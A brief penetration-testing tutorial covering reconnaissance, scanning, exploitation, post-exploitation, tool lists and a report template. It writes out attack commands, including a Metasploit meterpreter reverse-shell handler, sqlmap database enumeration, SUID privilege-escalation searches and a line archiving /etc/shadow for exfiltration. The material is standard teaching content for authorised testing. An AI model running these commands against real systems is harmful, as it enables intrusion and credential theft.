Penetration Testing
Testing methodologies, tools, reconnaissance, exploitation, and reporting.
Overview
Penetration testing identifies vulnerabilities before attackers do.
Testing Methodology
1. Reconnaissance
# Passive reconnaissance
whois target.com
nslookup target.com
dig target.com ANY
# Active reconnaissance
nmap -sV -sC target.com
nikto -h target.com
2. Scanning
# Port scanning
nmap -p- -T4 target.com
nmap -sU --top-ports 100 target.com
# Vulnerability scanning
nessus target.com
openvas target.com
3. Exploitation
# Metasploit
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit
# SQL injection
sqlmap -u "http://target.com/page?id=1" --dbs
4. Post-Exploitation
# Privilege escalation
sudo -l
find / -perm -4000 2>/dev/null
# Data exfiltration
tar czf /tmp/data.tar.gz /etc/shadow
Testing Types
| Type | Scope | Authorization |
|---|---|---|
| Black Box | No knowledge | Full |
| White Box | Full knowledge | Full |
| Gray Box | Partial knowledge | Full |
| Red Team | Adversary simulation | Full |
Common Tools
| Tool | Purpose |
|---|---|
| Nmap | Network scanning |
| Metasploit | Exploitation framework |
| Burp Suite | Web application testing |
| John the Ripper | Password cracking |
| Wireshark | Packet analysis |
| Aircrack-ng | Wireless testing |
Reporting Template
# Penetration Test Report
## Executive Summary
- Test Date: YYYY-MM-DD
- Scope: [systems tested]
- Overall Risk: [High/Medium/Low]
## Findings
### Critical: SQL Injection
- Location: /login.php
- Impact: Database compromise
- Remediation: Use parameterized queries
### Medium: Weak Password Policy
- Location: User accounts
- Impact: Account compromise
- Remediation: Enforce complex passwords
## Recommendations
1. Implement input validation
2. Enable multi-factor authentication
3. Regular security training
Practice
Conduct a penetration test on a vulnerable lab environment like HackTheBox.